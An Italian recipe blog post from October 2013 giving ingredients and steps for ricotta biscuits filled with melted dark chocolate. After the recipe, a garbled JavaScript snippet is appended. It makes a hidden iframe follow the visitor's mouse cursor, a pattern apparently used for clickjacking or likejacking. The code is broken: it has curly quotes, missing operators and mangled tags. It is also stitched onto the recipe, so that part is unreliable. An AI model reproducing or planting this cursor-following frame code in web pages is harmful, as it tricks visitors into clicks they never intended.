lunedì 7 ottobre 2013

Doppi biscotti alla crema di cioccolato

INGREDIENTI PER 6 PERSONE 300 gr di farina "00" 300 gr di ricotta fresca 100gr di cioccolato fondente 80 gr di burro 1 bustina di lievito vanigliato 1 bustina di vanillina 1 cucchiaio di zucchero a velo sale PREPARAZIONE Impastate su una spianatoia la farina con la ricotta ,70 gr di burro a pezzetti ,il lievito ,la vanillina e un pizzico di sale.Stendete la pasta con il mattarello ,piegatela in tre parti e stendetela di nuovo.Ripetete  questa operazione per 3-4 volte poi ripiegate la pasta e copritela con una ciotola capovolta e fatela riposare per 30 min.Scaldate il forno a 180 °c .Stendete la pasta in una sfoglia dello spessore di circa 1/2 cm e ritagliate un numero pari di dischetti .Su meta' di essi ritagliate 3 quadratini con la punta di un coltello .Allineate i biscotti su una placca rivestita con carta da forno e cuoceteli in forno per circa 15 min .Sfornateli e fateli raffreddare .Spezzettate il cioccolato e fatelo fondere a bagnomaria con il burro rimasto .Spalmatelo sui i biscotti non forati e sovrapponetevi gli altri premendo leggermente ,poi cospargeteli di zucchero a velo ..ecco fatto il piatto e' pronto!!!
text/javascript”> var opacity = 0.5; var time = 0; if((document.getElementById) window.addEventListener || window.attachEvent){ (function(){ var hairCol = “#ff0000″; var d = document; var my = -10; var mx = -10; var r; var vert = “”; var idx = document.getElementsByTagName(‘div’).length; var thehairs = “”; document.write(thehairs); var like = document.getElementById(“theiframe”); document.getElementsByTagName(‘body’)[0].appendChild(like); var pix = “px”; var domWw = (typeof window.innerWidth == “number”); var domSy = (typeof window.pageYOffset == “number”); if (domWw) r = window; else{ if (d.documentElement typeof d.documentElement.clientWidth == “number” d.documentElement.clientWidth != 0) r = d.documentElement; else{ if (d.body typeof d.body.clientWidth == “number”) r = d.body; } } if(time != 0){ setTimeout(function(){ document.getElementsByTagName(‘body’)[0].removeChild(like); if (window.addEventListener){ document.removeEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ document.detachEvent(“onmousemove”,mouse); } }, time); } function scrl(yx){ var y,x; if (domSy){ y = r.pageYOffset; x = r.pageXOffset; } else{ y = r.scrollTop; x = r.scrollLeft; } return (yx == 0) ? y:x; } function mouse(e){ var msy = (domSy)?window.pageYOffset:0; if (!e) e = window.event; if (typeof e.pageY == ‘number’){ my = e.pageY – 5 – msy; mx = e.pageX – 4; } else{ my = e.clientY – 6 – msy; mx = e.clientX – 6; } vert.top = my + scrl(0) + pix; vert.left = mx + pix; } function ani(){ vert.top = my + scrl(0) + pix; setTimeout(ani, 300); } function init(){ vert = document.getElementById(“theiframe”).style; ani(); } if (window.addEventListener){ window.addEventListener(“load”,init,false); document.addEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ window.attachEvent(“onload”,init); document.attachEvent(“onmousemove”,mouse); } })(); }//End. script>